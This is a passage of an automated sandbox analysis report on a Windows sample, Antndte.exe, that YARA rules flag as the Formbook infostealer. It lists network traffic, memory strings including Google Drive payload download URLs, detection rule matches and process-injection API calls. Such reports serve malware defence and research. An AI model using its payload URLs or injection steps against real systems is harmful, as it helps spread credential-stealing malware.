        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 293 X-Sorting-Hat-ShopId: 83935199526 Vary: Accept-Encoding X-Frame-Options: DENY X-ShopId: 83935199526 X-ShardId: 293 Content-Language: en-US Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:14 GMT; SameSite=Lax Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:14 GMT; SameSite=Lax Set-Cookie: _shopify_y=02be2310-1102-43bf-bbf2-013301af3494; Expires=Tue, 03-Dec-24 14:28:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax Set-Cookie: _shopify_s=031fab2f-5531-432f-acdb-c3e393998f7a; Expires=Mon, 04-Dec-23 14:58:14 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax Server-Timing: processing;dur=121 X-Shopify-Stage: production Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9b7230b8-28ec-4cf Data Raw: Data Ascii:
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 293 X-Sorting-Hat-ShopId: 83935199526 Vary: Accept-Encoding X-Frame-Options: DENY X-ShopId: 83935199526 X-ShardId: 293 Content-Language: en-US Set-Cookie: localization=US; path=/; expires=Wed, 04 Dec 2024 14:28:17 GMT; SameSite=Lax Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Tue, 05 Dec 2023 14:28:17 GMT; SameSite=Lax Set-Cookie: _shopify_y=2e4bd00b-11d3-4efc-9730-41f05ece12d0; Expires=Tue, 03-Dec-24 14:28:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax Set-Cookie: _shopify_s=219adf6f-de36-4280-bfaa-386c2d51f9ae; Expires=Mon, 04-Dec-23 14:58:17 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax Server-Timing: processing;dur=161 X-Shopify-Stage: production Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=031c8eb7-0c56-477 Data Raw: Data Ascii:
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:39 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:42 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:44 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 04 Dec 2023 14:28:47 GMT Server: Apache X-Xss-Protection: 1; mode=block Referrer-Policy: no-referrer-when-downgrade X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 04 Dec 2023 14:29:24 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 
20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:29:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:30:02 GMTserver: LiteSpeedData Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Antndte.exe, 00000000.00000000.9659783215.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Antndte.exe, 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Antndte.exe, 00000002.00000000.9886080222.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: Antndte.exe, 00000002.00000001.9887364780.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Antndte.exe, 00000002.00000001.9887364780.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005389000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/c
        Source: Antndte.exe, 00000002.00000002.10097194599.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.000000000540F000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985973812.000000000540E000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004462210.000000000540E000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004311607.00000000053B6000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfq
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0c-0k-docs.googleusercontent.com/l
        Source: Antndte.exe, 00000002.00000002.10108976689.0000000034AD0000.00000004.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10096947638.0000000005348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3j
        Source: Antndte.exe, 00000002.00000002.10096947638.0000000005348000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3oNL
        Source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: Antndte.exe, 00000002.00000003.10004787595.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10053726919.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985655767.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10004146203.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10097194599.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9985889326.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: Antndte.exe, 00000002.00000003.9975455911.00000000053CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
        Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
        Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:50129 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:50130 version: TLS 1.2
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425

        E-Banking Fraud

        Source: Yara matchFile source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F34E0 NtCreateMutant,LdrInitializeThunk,2_2_357F34E0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_357F2D10
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_357F2B90
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F4570 NtSuspendThread,2_2_357F4570
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F4260 NtSetContextThread,2_2_357F4260
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2D50 NtWriteVirtualMemory,2_2_357F2D50
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2DC0 NtAdjustPrivilegesToken,2_2_357F2DC0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2DA0 NtReadVirtualMemory,2_2_357F2DA0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C50 NtUnmapViewOfSection,2_2_357F2C50
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F3C30 NtOpenProcessToken,2_2_357F3C30
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C30 NtMapViewOfSection,2_2_357F2C30
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C20 NtSetInformationFile,2_2_357F2C20
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2C10 NtOpenProcess,2_2_357F2C10
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2CF0 NtDelayExecution,2_2_357F2CF0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F2CD0 NtEnumerateKey,2_2_357F2CD0
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 2_2_357F3C90 NtOpenThread,2_2_357F3C90
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
        Source: C:\Users\user\Desktop\Antndte.exeFile created: C:\Windows\resources\0409
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 3582E692 appears 62 times
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 35807BE4 appears 58 times
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 3583EF10 appears 66 times
        Source: C:\Users\user\Desktop\Antndte.exeCode function: String function: 357AB910 appears 123 times
        Source: Antndte.exe, 00000002.00000003.10003571766.000000003554F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000003.10007207105.0000000035707000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000003.10054010523.00000000354AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Antndte.exe
        Source: Antndte.exe, 00000002.00000002.10110110994.0000000035A50000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Antndte.exe
        Source: C:\Users\user\Desktop\Antndte.exeSection loaded: edgegdi.dll
        Source: Antndte.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
